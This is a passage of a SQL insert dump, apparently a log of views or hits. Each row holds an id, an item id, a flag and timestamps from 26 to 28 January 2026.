01:19:05'),(104257,5712,1,'2026-01-26','2026-01-26 01:19:41'),(104258,3045,1,'2026-01-26','2026-01-26 01:38:23'),(104259,72,1,'2026-01-26','2026-01-26 03:42:04'),(104260,5712,1,'2026-01-26','2026-01-26 04:17:32'),(104261,3055,1,'2026-01-26','2026-01-26 05:47:53'),(104262,2609,1,'2026-01-26','2026-01-26 06:00:22'),(104263,468,1,'2026-01-26','2026-01-26 06:01:32'),(104264,91,1,'2026-01-26','2026-01-26 06:31:30'),(104265,5157,1,'2026-01-26','2026-01-26 07:57:38'),(104266,5436,1,'2026-01-26','2026-01-26 08:04:09'),(104267,5467,1,'2026-01-26','2026-01-26 08:09:26'),(104268,5449,1,'2026-01-26','2026-01-26 08:11:27'),(104269,5712,1,'2026-01-26','2026-01-26 08:27:49'),(104270,72,1,'2026-01-26','2026-01-26 08:45:54'),(104271,3788,1,'2026-01-26','2026-01-26 08:50:03'),(104272,5712,1,'2026-01-26','2026-01-26 08:50:18'),(104273,5712,1,'2026-01-26','2026-01-26 09:42:27'),(104274,89,1,'2026-01-26','2026-01-26 10:02:06'),(104275,3282,1,'2026-01-26','2026-01-26 10:10:19'),(104276,91,1,'2026-01-26','2026-01-26 10:23:46'),(104277,1582,1,'2026-01-26','2026-01-26 10:36:21'),(104278,5712,1,'2026-01-26','2026-01-26 10:39:05'),(104279,5712,1,'2026-01-26','2026-01-26 10:44:46'),(104280,4944,1,'2026-01-26','2026-01-26 11:37:09'),(104281,5662,1,'2026-01-26','2026-01-26 11:51:04'),(104282,5400,1,'2026-01-26','2026-01-26 12:11:50'),(104283,1718,1,'2026-01-26','2026-01-26 12:22:09'),(104284,5712,1,'2026-01-26','2026-01-26 12:36:28'),(104285,4529,1,'2026-01-26','2026-01-26 12:37:09'),(104286,5712,1,'2026-01-26','2026-01-26 12:40:37'),(104287,5467,1,'2026-01-26','2026-01-26 12:44:25'),(104288,4485,1,'2026-01-26','2026-01-26 12:46:57'),(104289,4238,1,'2026-01-26','2026-01-26 12:58:44'),(104290,5400,1,'2026-01-26','2026-01-26 13:13:00'),(104291,5692,1,'2026-01-26','2026-01-26 13:18:04'),(104292,5406,1,'2026-01-26','2026-01-26 13:20:04'),(104293,5712,1,'2026-01-26','2026-01-26 14:07:42'),(104294,2904,1,'2026-01-26','2026-01-26 14:07:53'),(104295,4983,1,'2026-01-26','2026-01-26 14:32:28'),(104296,5712,1,'2026-01-26','2026-01-26 14:44:58'),(104297,3251,1,'2026-01-26','2026-01-26 15:22:27'),(104298,5712,1,'2026-01-26','2026-01-26 16:26:19'),(104299,5578,1,'2026-01-26','2026-01-26 16:26:28'),(104300,2904,1,'2026-01-26','2026-01-26 16:27:26'),(104301,5420,1,'2026-01-26','2026-01-26 16:31:26'),(104302,4400,1,'2026-01-26','2026-01-26 17:05:23'),(104303,4950,1,'2026-01-26','2026-01-26 17:40:07'),(104304,5492,1,'2026-01-26','2026-01-26 18:11:22'),(104305,4963,1,'2026-01-26','2026-01-26 18:15:15'),(104306,5636,1,'2026-01-26','2026-01-26 18:21:17'),(104307,4963,1,'2026-01-26','2026-01-26 18:27:33'),(104308,89,1,'2026-01-26','2026-01-26 18:28:40'),(104309,4963,1,'2026-01-26','2026-01-26 18:32:58'),(104310,5489,1,'2026-01-26','2026-01-26 18:36:27'),(104311,4420,1,'2026-01-26','2026-01-26 18:40:37'),(104312,4722,1,'2026-01-26','2026-01-26 18:57:36'),(104313,5502,1,'2026-01-26','2026-01-26 19:00:36'),(104314,5412,1,'2026-01-26','2026-01-26 19:03:36'),(104315,5626,1,'2026-01-26','2026-01-26 19:08:39'),(104316,3307,1,'2026-01-26','2026-01-26 19:13:22'),(104317,5717,1,'2026-01-26','2026-01-26 19:31:45'),(104318,5464,1,'2026-01-26','2026-01-26 19:35:15'),(104319,3267,1,'2026-01-26','2026-01-26 19:41:15'),(104320,4977,1,'2026-01-26','2026-01-26 19:41:55'),(104321,4681,1,'2026-01-26','2026-01-26 19:53:16'),(104322,5717,1,'2026-01-26','2026-01-26 20:07:46'),(104323,5721,1,'2026-01-26','2026-01-26 20:08:38'),(104324,5721,1,'2026-01-26','2026-01-26 20:11:11'),(104325,89,1,'2026-01-26','2026-01-26 20:13:46'),(104326,472,1,'2026-01-26','2026-01-26 20:32:10'),(104327,4712,1,'2026-01-26','2026-01-26 20:32:47'),(104328,3781,1,'2026-01-26','2026-01-26 20:38:48'),(104329,3117,1,'2026-01-26','2026-01-26 20:40:56'),(104330,3069,1,'2026-01-26','2026-01-26 21:02:55'),(104331,5738,1,'2026-01-26','2026-01-26 21:04:02'),(104332,5735,1,'2026-01-26','2026-01-26 21:04:10'),(104333,5738,1,'2026-01-26','2026-01-26 21:05:03'),(104334,5735,1,'2026-01-26','2026-01-26 21:05:04'),(104335,5735,1,'2026-01-26','2026-01-26 21:06:25'),(104336,5738,1,'2026-01-26','2026-01-26 21:06:44'),(104337,2704,1,'2026-01-26','2026-01-26 21:11:34'),(104338,2904,1,'2026-01-26','2026-01-26 21:13:13'),(104339,5712,1,'2026-01-26','2026-01-26 21:15:40'),(104340,5712,1,'2026-01-26','2026-01-26 21:15:41'),(104341,5712,1,'2026-01-26','2026-01-26 21:15:45'),(104342,3083,1,'2026-01-26','2026-01-26 21:19:06'),(104343,5363,1,'2026-01-26','2026-01-26 21:32:36'),(104344,5725,1,'2026-01-26','2026-01-26 21:38:17'),(104345,1602,1,'2026-01-26','2026-01-26 22:18:47'),(104346,5573,1,'2026-01-26','2026-01-26 22:27:42'),(104347,3781,1,'2026-01-26','2026-01-26 22:27:44'),(104348,5409,1,'2026-01-26','2026-01-26 22:41:53'),(104349,5561,1,'2026-01-26','2026-01-26 22:48:06'),(104350,5433,1,'2026-01-26','2026-01-26 22:48:12'),(104351,2165,1,'2026-01-26','2026-01-26 22:57:49'),(104352,1608,1,'2026-01-26','2026-01-26 23:00:26'),(104353,5441,1,'2026-01-26','2026-01-26 23:01:10'),(104354,5400,1,'2026-01-26','2026-01-26 23:12:25'),(104355,5725,1,'2026-01-26','2026-01-26 23:30:42'),(104356,5712,1,'2026-01-27','2026-01-27 00:07:57'),(104357,5738,1,'2026-01-27','2026-01-27 01:13:37'),(104358,5735,1,'2026-01-27','2026-01-27 01:13:55'),(104359,5639,1,'2026-01-27','2026-01-27 01:39:41'),(104360,5618,1,'2026-01-27','2026-01-27 02:24:58'),(104361,3045,1,'2026-01-27','2026-01-27 02:49:05'),(104362,5712,1,'2026-01-27','2026-01-27 03:06:14'),(104363,1701,1,'2026-01-27','2026-01-27 03:14:29'),(104364,5626,1,'2026-01-27','2026-01-27 03:20:38'),(104365,5657,1,'2026-01-27','2026-01-27 04:12:04'),(104366,4911,1,'2026-01-27','2026-01-27 04:26:20'),(104367,5512,1,'2026-01-27','2026-01-27 04:46:51'),(104368,4950,1,'2026-01-27','2026-01-27 04:48:29'),(104369,5457,1,'2026-01-27','2026-01-27 04:52:52'),(104370,5712,1,'2026-01-27','2026-01-27 05:19:22'),(104371,5128,1,'2026-01-27','2026-01-27 05:30:02'),(104372,4963,1,'2026-01-27','2026-01-27 05:53:35'),(104373,1726,1,'2026-01-27','2026-01-27 06:01:17'),(104374,1612,1,'2026-01-27','2026-01-27 06:26:35'),(104375,3498,1,'2026-01-27','2026-01-27 07:07:24'),(104376,4660,1,'2026-01-27','2026-01-27 07:28:50'),(104377,5717,1,'2026-01-27','2026-01-27 07:37:56'),(104378,5717,1,'2026-01-27','2026-01-27 07:54:44'),(104379,5717,1,'2026-01-27','2026-01-27 07:59:31'),(104380,5717,1,'2026-01-27','2026-01-27 08:00:23'),(104381,5717,1,'2026-01-27','2026-01-27 08:00:45'),(104382,5717,1,'2026-01-27','2026-01-27 08:00:49'),(104383,5717,1,'2026-01-27','2026-01-27 08:00:51'),(104384,5721,1,'2026-01-27','2026-01-27 08:01:21'),(104385,5721,1,'2026-01-27','2026-01-27 08:03:36'),(104386,5717,1,'2026-01-27','2026-01-27 08:04:01'),(104387,5725,1,'2026-01-27','2026-01-27 08:04:41'),(104388,5725,1,'2026-01-27','2026-01-27 08:06:47'),(104389,5725,1,'2026-01-27','2026-01-27 08:06:48'),(104390,5725,1,'2026-01-27','2026-01-27 08:06:53'),(104391,5730,1,'2026-01-27','2026-01-27 08:07:17'),(104392,5721,1,'2026-01-27','2026-01-27 08:08:35'),(104393,5730,1,'2026-01-27','2026-01-27 08:08:41'),(104394,5721,1,'2026-01-27','2026-01-27 08:09:00'),(104395,5735,1,'2026-01-27','2026-01-27 08:09:27'),(104396,5735,1,'2026-01-27','2026-01-27 08:09:46'),(104397,5741,1,'2026-01-27','2026-01-27 08:10:13'),(104398,5730,1,'2026-01-27','2026-01-27 08:10:44'),(104399,5730,1,'2026-01-27','2026-01-27 08:13:51'),(104400,5717,1,'2026-01-27','2026-01-27 08:14:53'),(104401,5721,1,'2026-01-27','2026-01-27 08:14:59'),(104402,5721,1,'2026-01-27','2026-01-27 08:17:07'),(104403,72,1,'2026-01-27','2026-01-27 08:17:40'),(104404,5741,1,'2026-01-27','2026-01-27 08:17:48'),(104405,5741,1,'2026-01-27','2026-01-27 08:18:12'),(104406,5741,1,'2026-01-27','2026-01-27 08:18:32'),(104407,5741,1,'2026-01-27','2026-01-27 08:18:55'),(104408,72,1,'2026-01-27','2026-01-27 08:20:38'),(104409,5721,1,'2026-01-27','2026-01-27 08:21:50'),(104410,5725,1,'2026-01-27','2026-01-27 08:27:52'),(104411,5745,1,'2026-01-27','2026-01-27 08:30:16'),(104412,5721,1,'2026-01-27','2026-01-27 08:32:37'),(104413,5749,1,'2026-01-27','2026-01-27 08:35:43'),(104414,5712,1,'2026-01-27','2026-01-27 08:40:08'),(104415,72,1,'2026-01-27','2026-01-27 08:44:49'),(104416,5721,1,'2026-01-27','2026-01-27 08:45:01'),(104417,5741,1,'2026-01-27','2026-01-27 08:48:48'),(104418,5721,1,'2026-01-27','2026-01-27 08:49:19'),(104419,5674,1,'2026-01-27','2026-01-27 09:04:16'),(104420,5741,1,'2026-01-27','2026-01-27 09:04:30'),(104421,1608,1,'2026-01-27','2026-01-27 09:11:43'),(104422,5725,1,'2026-01-27','2026-01-27 09:18:14'),(104423,3438,1,'2026-01-27','2026-01-27 09:19:57'),(104424,5717,1,'2026-01-27','2026-01-27 09:27:51'),(104425,5721,1,'2026-01-27','2026-01-27 09:28:06'),(104426,5745,1,'2026-01-27','2026-01-27 09:29:21'),(104427,91,1,'2026-01-27','2026-01-27 09:31:16'),(104428,5570,1,'2026-01-27','2026-01-27 09:32:14'),(104429,5454,1,'2026-01-27','2026-01-27 09:36:59'),(104430,5749,1,'2026-01-27','2026-01-27 09:37:42'),(104431,5721,1,'2026-01-27','2026-01-27 09:38:22'),(104432,5749,1,'2026-01-27','2026-01-27 09:39:31'),(104433,5749,1,'2026-01-27','2026-01-27 09:40:22'),(104434,3079,1,'2026-01-27','2026-01-27 09:41:18'),(104435,5749,1,'2026-01-27','2026-01-27 09:41:26'),(104436,5749,1,'2026-01-27','2026-01-27 09:41:38'),(104437,5749,1,'2026-01-27','2026-01-27 09:43:09'),(104438,72,1,'2026-01-27','2026-01-27 09:43:52'),(104439,5749,1,'2026-01-27','2026-01-27 09:44:14'),(104440,5712,1,'2026-01-27','2026-01-27 09:45:21'),(104441,5749,1,'2026-01-27','2026-01-27 09:45:39'),(104442,5749,1,'2026-01-27','2026-01-27 09:46:24'),(104443,5753,1,'2026-01-27','2026-01-27 09:47:19'),(104444,5745,1,'2026-01-27','2026-01-27 09:48:50'),(104445,5730,1,'2026-01-27','2026-01-27 09:49:44'),(104446,5745,1,'2026-01-27','2026-01-27 09:50:54'),(104447,5753,1,'2026-01-27','2026-01-27 09:51:12'),(104448,5753,1,'2026-01-27','2026-01-27 09:51:52'),(104449,5757,1,'2026-01-27','2026-01-27 09:52:17'),(104450,5757,1,'2026-01-27','2026-01-27 09:52:31'),(104451,5757,1,'2026-01-27','2026-01-27 09:56:23'),(104452,5721,1,'2026-01-27','2026-01-27 10:00:16'),(104453,5753,1,'2026-01-27','2026-01-27 10:01:23'),(104454,5725,1,'2026-01-27','2026-01-27 10:01:38'),(104455,4950,1,'2026-01-27','2026-01-27 10:02:41'),(104456,4950,1,'2026-01-27','2026-01-27 10:03:03'),(104457,5725,1,'2026-01-27','2026-01-27 10:16:44'),(104458,5753,1,'2026-01-27','2026-01-27 10:17:19'),(104459,5753,1,'2026-01-27','2026-01-27 10:21:37'),(104460,5741,1,'2026-01-27','2026-01-27 10:23:14'),(104461,91,1,'2026-01-27','2026-01-27 10:26:03'),(104462,5757,1,'2026-01-27','2026-01-27 10:29:39'),(104463,5712,1,'2026-01-27','2026-01-27 10:34:22'),(104464,5753,1,'2026-01-27','2026-01-27 10:38:53'),(104465,5593,1,'2026-01-27','2026-01-27 10:40:40'),(104466,5745,1,'2026-01-27','2026-01-27 10:41:40'),(104467,5745,1,'2026-01-27','2026-01-27 10:42:00'),(104468,5712,1,'2026-01-27','2026-01-27 10:47:09'),(104469,5712,1,'2026-01-27','2026-01-27 10:52:01'),(104470,5753,1,'2026-01-27','2026-01-27 10:52:39'),(104471,5757,1,'2026-01-27','2026-01-27 10:55:25'),(104472,68,1,'2026-01-27','2026-01-27 10:57:21'),(104473,5757,1,'2026-01-27','2026-01-27 10:58:05'),(104474,80,1,'2026-01-27','2026-01-27 10:58:51'),(104475,5757,1,'2026-01-27','2026-01-27 11:03:09'),(104476,3083,1,'2026-01-27','2026-01-27 11:07:32'),(104477,3083,1,'2026-01-27','2026-01-27 11:07:33'),(104478,3083,1,'2026-01-27','2026-01-27 11:07:34'),(104479,5643,1,'2026-01-27','2026-01-27 11:21:10'),(104480,5745,1,'2026-01-27','2026-01-27 11:30:19'),(104481,5753,1,'2026-01-27','2026-01-27 11:32:52'),(104482,5454,1,'2026-01-27','2026-01-27 12:09:22'),(104483,5753,1,'2026-01-27','2026-01-27 12:10:09'),(104484,4950,1,'2026-01-27','2026-01-27 12:11:42'),(104485,5730,1,'2026-01-27','2026-01-27 12:14:57'),(104486,5725,1,'2026-01-27','2026-01-27 12:16:50'),(104487,5441,1,'2026-01-27','2026-01-27 12:25:42'),(104488,5757,1,'2026-01-27','2026-01-27 12:37:08'),(104489,5721,1,'2026-01-27','2026-01-27 12:41:56'),(104490,5721,1,'2026-01-27','2026-01-27 12:42:19'),(104491,5626,1,'2026-01-27','2026-01-27 12:46:30'),(104492,5712,1,'2026-01-27','2026-01-27 12:54:03'),(104493,5626,1,'2026-01-27','2026-01-27 12:58:05'),(104494,1608,1,'2026-01-27','2026-01-27 13:08:40'),(104495,4950,1,'2026-01-27','2026-01-27 13:11:30'),(104496,5741,1,'2026-01-27','2026-01-27 13:14:19'),(104497,5712,1,'2026-01-27','2026-01-27 13:25:40'),(104498,5449,1,'2026-01-27','2026-01-27 13:25:52'),(104499,5757,1,'2026-01-27','2026-01-27 13:28:45'),(104500,5757,1,'2026-01-27','2026-01-27 13:28:54'),(104501,5753,1,'2026-01-27','2026-01-27 13:40:45'),(104502,5712,1,'2026-01-27','2026-01-27 13:51:36'),(104503,5712,1,'2026-01-27','2026-01-27 13:52:31'),(104504,5622,1,'2026-01-27','2026-01-27 14:01:33'),(104505,5721,1,'2026-01-27','2026-01-27 14:02:52'),(104506,5757,1,'2026-01-27','2026-01-27 14:08:05'),(104507,5757,1,'2026-01-27','2026-01-27 14:08:05'),(104508,5741,1,'2026-01-27','2026-01-27 14:10:18'),(104509,5749,1,'2026-01-27','2026-01-27 14:11:45'),(104510,5749,1,'2026-01-27','2026-01-27 14:11:51'),(104511,5741,1,'2026-01-27','2026-01-27 14:17:57'),(104512,5749,1,'2026-01-27','2026-01-27 14:19:19'),(104513,5741,1,'2026-01-27','2026-01-27 14:20:09'),(104514,4960,1,'2026-01-27','2026-01-27 14:25:32'),(104515,5745,1,'2026-01-27','2026-01-27 14:27:47'),(104516,5420,1,'2026-01-27','2026-01-27 14:30:06'),(104517,80,1,'2026-01-27','2026-01-27 14:34:41'),(104518,76,1,'2026-01-27','2026-01-27 14:36:34'),(104519,5757,1,'2026-01-27','2026-01-27 14:45:52'),(104520,5757,1,'2026-01-27','2026-01-27 14:55:45'),(104521,5605,1,'2026-01-27','2026-01-27 15:02:18'),(104522,5730,1,'2026-01-27','2026-01-27 15:06:33'),(104523,5712,1,'2026-01-27','2026-01-27 15:20:20'),(104524,5753,1,'2026-01-27','2026-01-27 15:25:08'),(104525,5721,1,'2026-01-27','2026-01-27 15:26:22'),(104526,5425,1,'2026-01-27','2026-01-27 15:39:49'),(104527,5757,1,'2026-01-27','2026-01-27 15:45:46'),(104528,5614,1,'2026-01-27','2026-01-27 15:46:59'),(104529,5757,1,'2026-01-27','2026-01-27 15:48:02'),(104530,5757,1,'2026-01-27','2026-01-27 16:05:23'),(104531,68,1,'2026-01-27','2026-01-27 16:09:34'),(104532,3781,1,'2026-01-27','2026-01-27 16:12:42'),(104533,5757,1,'2026-01-27','2026-01-27 16:14:36'),(104534,5725,1,'2026-01-27','2026-01-27 16:19:18'),(104535,5757,1,'2026-01-27','2026-01-27 16:23:10'),(104536,5757,1,'2026-01-27','2026-01-27 16:23:16'),(104537,5712,1,'2026-01-27','2026-01-27 16:25:28'),(104538,4983,1,'2026-01-27','2026-01-27 16:37:13'),(104539,5666,1,'2026-01-27','2026-01-27 16:43:10'),(104540,5730,1,'2026-01-27','2026-01-27 16:55:52'),(104541,5741,1,'2026-01-27','2026-01-27 17:02:37'),(104542,4840,1,'2026-01-27','2026-01-27 17:17:52'),(104543,5738,1,'2026-01-27','2026-01-27 17:19:22'),(104544,5735,1,'2026-01-27','2026-01-27 17:21:54'),(104545,5757,1,'2026-01-27','2026-01-27 17:26:54'),(104546,3486,1,'2026-01-27','2026-01-27 17:46:11'),(104547,477,1,'2026-01-27','2026-01-27 17:48:02'),(104548,4950,1,'2026-01-27','2026-01-27 17:55:06'),(104549,5749,1,'2026-01-27','2026-01-27 17:59:08'),(104550,5712,1,'2026-01-27','2026-01-27 18:02:53'),(104551,5753,1,'2026-01-27','2026-01-27 18:03:10'),(104552,5725,1,'2026-01-27','2026-01-27 18:03:13'),(104553,5749,1,'2026-01-27','2026-01-27 18:05:15'),(104554,5721,1,'2026-01-27','2026-01-27 18:16:08'),(104555,5753,1,'2026-01-27','2026-01-27 18:16:40'),(104556,4719,1,'2026-01-27','2026-01-27 18:24:12'),(104557,5492,1,'2026-01-27','2026-01-27 18:36:01'),(104558,5712,1,'2026-01-27','2026-01-27 18:39:16'),(104559,3307,1,'2026-01-27','2026-01-27 18:40:12'),(104560,5730,1,'2026-01-27','2026-01-27 18:50:27'),(104561,5757,1,'2026-01-27','2026-01-27 19:02:10'),(104562,5406,1,'2026-01-27','2026-01-27 19:13:07'),(104563,3056,1,'2026-01-27','2026-01-27 19:14:30'),(104564,3781,1,'2026-01-27','2026-01-27 19:34:00'),(104565,4681,1,'2026-01-27','2026-01-27 19:46:04'),(104566,5725,1,'2026-01-27','2026-01-27 19:56:00'),(104567,5757,1,'2026-01-27','2026-01-27 20:08:00'),(104568,5757,1,'2026-01-27','2026-01-27 20:08:00'),(104569,5730,1,'2026-01-27','2026-01-27 20:10:35'),(104570,5428,1,'2026-01-27','2026-01-27 20:15:03'),(104571,5515,1,'2026-01-27','2026-01-27 20:23:59'),(104572,3038,1,'2026-01-27','2026-01-27 20:24:01'),(104573,5712,1,'2026-01-27','2026-01-27 20:31:33'),(104574,5712,1,'2026-01-27','2026-01-27 20:31:56'),(104575,5721,1,'2026-01-27','2026-01-27 20:35:17'),(104576,5721,1,'2026-01-27','2026-01-27 20:36:14'),(104577,5433,1,'2026-01-27','2026-01-27 20:37:48'),(104578,5125,1,'2026-01-27','2026-01-27 20:38:47'),(104579,3752,1,'2026-01-27','2026-01-27 20:47:50'),(104580,5449,1,'2026-01-27','2026-01-27 21:01:29'),(104581,5757,1,'2026-01-27','2026-01-27 21:08:39'),(104582,5757,1,'2026-01-27','2026-01-27 21:08:40'),(104583,5749,1,'2026-01-27','2026-01-27 21:14:43'),(104584,5567,1,'2026-01-27','2026-01-27 21:15:23'),(104585,5730,1,'2026-01-27','2026-01-27 21:28:52'),(104586,5730,1,'2026-01-27','2026-01-27 21:37:10'),(104587,5420,1,'2026-01-27','2026-01-27 21:41:28'),(104588,5712,1,'2026-01-27','2026-01-27 22:10:24'),(104589,5512,1,'2026-01-27','2026-01-27 22:13:01'),(104590,5692,1,'2026-01-27','2026-01-27 22:24:11'),(104591,5749,1,'2026-01-27','2026-01-27 22:26:46'),(104592,4977,1,'2026-01-27','2026-01-27 22:37:18'),(104593,4660,1,'2026-01-27','2026-01-27 22:44:18'),(104594,4960,1,'2026-01-27','2026-01-27 23:03:25'),(104595,467,1,'2026-01-27','2026-01-27 23:17:03'),(104596,5037,1,'2026-01-27','2026-01-27 23:21:49'),(104597,5757,1,'2026-01-27','2026-01-27 23:22:51'),(104598,4874,1,'2026-01-27','2026-01-27 23:25:59'),(104599,5024,1,'2026-01-27','2026-01-27 23:37:45'),(104600,5028,1,'2026-01-27','2026-01-27 23:37:49'),(104601,5454,1,'2026-01-27','2026-01-27 23:46:06'),(104602,5757,1,'2026-01-27','2026-01-27 23:57:40'),(104603,5730,1,'2026-01-28','2026-01-28 00:03:52'),(104604,5436,1,'2026-01-28','2026-01-28 00:05:31'),(104605,5749,1,'2026-01-28','2026-01-28 00:07:45'),(104606,2904,1,'2026-01-28','2026-01-28 00:10:52'),(104607,2904,1,'2026-01-28','2026-01-28 00:11:30'),(104608,2904,1,'2026-01-28','2026-01-28 00:12:26'),(104609,2904,1,'2026-01-28','2026-01-28 00:12:36'),(104610,5730,1,'2026-01-28','2026-01-28 00:12:37'),(104611,72,1,'2026-01-28','2026-01-28 00:24:51'),(104612,5749,1,'2026-01-28','2026-01-28 00:25:43'),(104613,5717,1,'2026-01-28','2026-01-28 00:25:43'),(104614,5730,1,'2026-01-28','2026-01-28 00:25:44'),(104615,5757,1,'2026-01-28','2026-01-28 00:25:44'),(104616,5741,1,'2026-01-28','2026-01-28 00:25:45'),(104617,5725,1,'2026-01-28','2026-01-28 00:25:46'),(104618,5721,1,'2026-01-28','2026-01-28 00:25:47'),(104619,5745,1,'2026-01-28','2026-01-28 00:25:54'),(104620,5753,1,'2026-01-28','2026-01-28 00:25:55'),(104621,5721,1,'2026-01-28','2026-01-28 00:26:57'),(104622,5749,1,'2026-01-28','2026-01-28 00:26:58'),(104623,5717,1,'2026-01-28','2026-01-28 00:26:58'),(104624,5757,1,'2026-01-28','2026-01-28 00:26:59'),(104625,5741,1,'2026-01-28','2026-01-28 00:27:00'),(104626,5725,1,'2026-01-28','2026-01-28 00:27:00'),(104627,5730,1,'2026-01-28','2026-01-28 00:27:00'),(104628,5745,1,'2026-01-28','2026-01-28 00:27:04'),(104629,5741,1,'2026-01-28','2026-01-28 00:27:49'),(104630,1715,1,'2026-01-28','2026-01-28 00:54:25'),(104631,5578,1,'2026-01-28','2026-01-28 03:24:04'),(104632,4950,1,'2026-01-28','2026-01-28 03:32:33'),(104633,4950,1,'2026-01-28','2026-01-28 03:33:36'),(104634,4950,1,'2026-01-28','2026-01-28 03:34:52'),(104635,5700,1,'2026-01-28','2026-01-28 03:48:44'),(104636,4400,1,'2026-01-28','2026-01-28 04:19:19'),(104637,1747,1,'2026-01-28','2026-01-28 04:30:43'),(104638,5067,1,'2026-01-28','2026-01-28 04:34:16'),(104639,5409,1,'2026-01-28','2026-01-28 04:44:50'),(104640,5730,1,'2026-01-28','2026-01-28 04:50:32'),(104641,5717,1,'2026-01-28','2026-01-28 04:50:33'),(104642,5721,1,'2026-01-28','2026-01-28 04:50:34'),(104643,5725,1,'2026-01-28','2026-01-28 04:50:37'),(104644,5741,1,'2026-01-28','2026-01-28 04:50:39'),(104645,5753,1,'2026-01-28','2026-01-28 04:50:39'),(104646,5749,1,'2026-01-28','2026-01-28 04:50:40'),(104647,5757,1,'2026-01-28','2026-01-28 04:50:41'),(104648,5745,1,'2026-01-28','2026-01-28 04:50:44'),(104649,3764,1,'2026-01-28','2026-01-28 05:22:27'),(104650,2775,1,'2026-01-28','2026-01-28 05:23:28'),(104651,4348,1,'2026-01-28','2026-01-28 05:26:06'),(104652,5001,1,'2026-01-28','2026-01-28 05:26:07'),(104653,5116,1,'2026-01-28','2026-01-28 05:26:09'),(104654,5461,1,'2026-01-28','2026-01-28 05:44:05'),(104655,5717,1,'2026-01-28','2026-01-28 06:05:04'),(104656,5730,1,'2026-01-28','2026-01-28 06:05:10'),(104657,4960,1,'2026-01-28','2026-01-28 06:10:02'),(104658,4608,1,'2026-01-28','2026-01-28 06:12:51'),(104659,5741,1,'2026-01-28','2026-01-28 06:35:37'),(104660,4489,1,'2026-01-28','2026-01-28 06:49:59'),(104661,5721,1,'2026-01-28','2026-01-28 06:53:31'),(104662,5062,1,'2026-01-28','2026-01-28 07:02:52'),(104663,5745,1,'2026-01-28','2026-01-28 07:06:24'),(104664,5489,1,'2026-01-28','2026-01-28 07:18:59'),(104665,5721,1,'2026-01-28','2026-01-28 07:19:55'),(104666,5570,1,'2026-01-28','2026-01-28 07:21:32'),(104667,5730,1,'2026-01-28','2026-01-28 07:22:29'),(104668,5730,1,'2026-01-28','2026-01-28 07:23:28'),(104669,5163,1,'2026-01-28','2026-01-28 07:32:38'),(104670,5753,1,'2026-01-28','2026-01-28 07:34:58'),(104671,5757,1,'2026-01-28','2026-01-28 08:04:53'),(104672,5712,1,'2026-01-28','2026-01-28 08:44:21'),(104673,5131,1,'2026-01-28','2026-01-28 08:50:04'),(104674,5725,1,'2026-01-28','2026-01-28 08:57:51'),(104675,89,1,'2026-01-28','2026-01-28 09:40:43'),(104676,5721,1,'2026-01-28','2026-01-28 09:56:37'),(104677,91,1,'2026-01-28','2026-01-28 10:27:10'),(104678,4950,1,'2026-01-28','2026-01-28 10:28:47'),(104679,2769,1,'2026-01-28','2026-01-28 10:41:01'),(104680,5406,1,'2026-01-28','2026-01-28 10:50:40'),(104681,110,1,'2026-01-28','2026-01-28 10:57:39'),(104682,87,1,'2026-01-28','2026-01-28 11:14:34'),(104683,5712,1,'2026-01-28','2026-01-28 11:23:28'),(104684,5712,1,'2026-01-28','2026-01-28 11:25:59'),(104685,5712,1,'2026-01-28','2026-01-28 11:35:49'),(104686,2152,1,'2026-01-28','2026-01-28 11:52:11'),(104687,2152,1,'2026-01-28','2026-01-28 11:52:19'),(104688,5464,1,'2026-01-28','2026-01-28 11:54:19'),(104689,1715,1,'2026-01-28','2026-01-28 12:00:01'),(104690,5397,1,'2026-01-28','2026-01-28 12:04:13'),(104691,4840,1,'2026-01-28','2026-01-28 12:10:35'),(104692,4950,1,'2026-01-28','2026-01-28 12:14:48'),(104693,4712,1,'2026-01-28','2026-01-28 12:17:48'),(104694,5712,1,'2026-01-28','2026-01-28 12:19:23'),(104695,5712,1,'2026-01-28','2026-01-28 12:19:23'),(104696,5712,1,'2026-01-28','2026-01-28 12:19:23'),(104697,5712,1,'2026-01-28','2026-01-28 12:19:23'),(104698,5712,1,'2026-01-28','2026-01-28 12:28:05'),(104699,5749,1,'2026-01-28','2026-01-28 12:35:13'),(104700,5712,1,'2026-01-28','2026-01-28 12:43:41'),(104701,5749,1,'2026-01-28','2026-01-28 12:52:25'),(104702,5725,1,'2026-01-28','2026-01-28 12:53:11'),(104703,5717,1,'2026-01-28','2026-01-28 13:54:09'),(104704,3038,1,'2026-01-28','2026-01-28 14:09:58'),(104705,5409,1,'2026-01-28','2026-01-28 14:30:48'),(104706,5762,1,'2026-01-28','2026-01-28 14:31:22'),(104707,5762,1,'2026-01-28','2026-01-28 14:32:27'),(104708,5561,1,'2026-01-28','2026-01-28 14:40:24'),(104709,5761,1,'2026-01-28','2026-01-28 14:40:44'),(104710,1614,1,'2026-01-28','2026-01-28 14:47:31'),(104711,5502,1,'2026-01-28','2026-01-28 14:50:57'),(104712,5762,1,'2026-01-28','2026-01-28 14:54:33'),(104713,5666,1,'2026-01-28','2026-01-28 15:23:13'),(104714,5666,1,'2026-01-28','2026-01-28 15:24:23'),(104715,5666,1,'2026-01-28','2026-01-28 15:25:03'),(104716,4608,1,'2026-01-28','2026-01-28 15:38:26'),(104717,5712,1,'2026-01-28','2026-01-28 15:39:20'),(104718,1602,1,'2026-01-28','2026-01-28 15:43:20'),(104719,5567,1,'2026-01-28','2026-01-28 16:06:30'),(104720,5712,1,'2026-01-28','2026-01-28 16:31:43'),(104721,5712,1,'2026-01-28','2026-01-28 16:31:46'),(104722,2297,1,'2026-01-28','2026-01-28 16:47:21'),(104723,5712,1,'2026-01-28','2026-01-28 16:52:38'),(104724,5721,1,'2026-01-28','2026-01-28 17:01:04'),(104725,5741,1,'2026-01-28','2026-01-28 17:15:14'),(104726,5730,1,'2026-01-28','2026-01-28 17:29:40'),(104727,5522,1,'2026-01-28','2026-01-28 17:35:29'),(104728,5712,1,'2026-01-28','2026-01-28 17:38:49'),(104729,4977,1,'2026-01-28','2026-01-28 17:38:54'),(104730,3102,1,'2026-01-28','2026-01-28 17:41:36'),(104731,5502,1,'2026-01-28','2026-01-28 18:05:11'),(104732,5712,1,'2026-01-28','2026-01-28 18:11:16'),(104733,3498,1,'2026-01-28','2026-01-28 18:40:46'),(104734,5436,1,'2026-01-28','2026-01-28 18:59:54'),(104735,5449,1,'2026-01-28','2026-01-28 19:00:49'),(104736,5712,1,'2026-01-28','2026-01-28 19:05:08'),(104737,5712,1,'2026-01-28','2026-01-28 19:14:01'),(104738,3069,1,'2026-01-28','2026-01-28 19:17:00'),(104739,5397,1,'2026-01-28','2026-01-28 19:28:12'),(104740,5420,1,'2026-01-28','2026-01-28 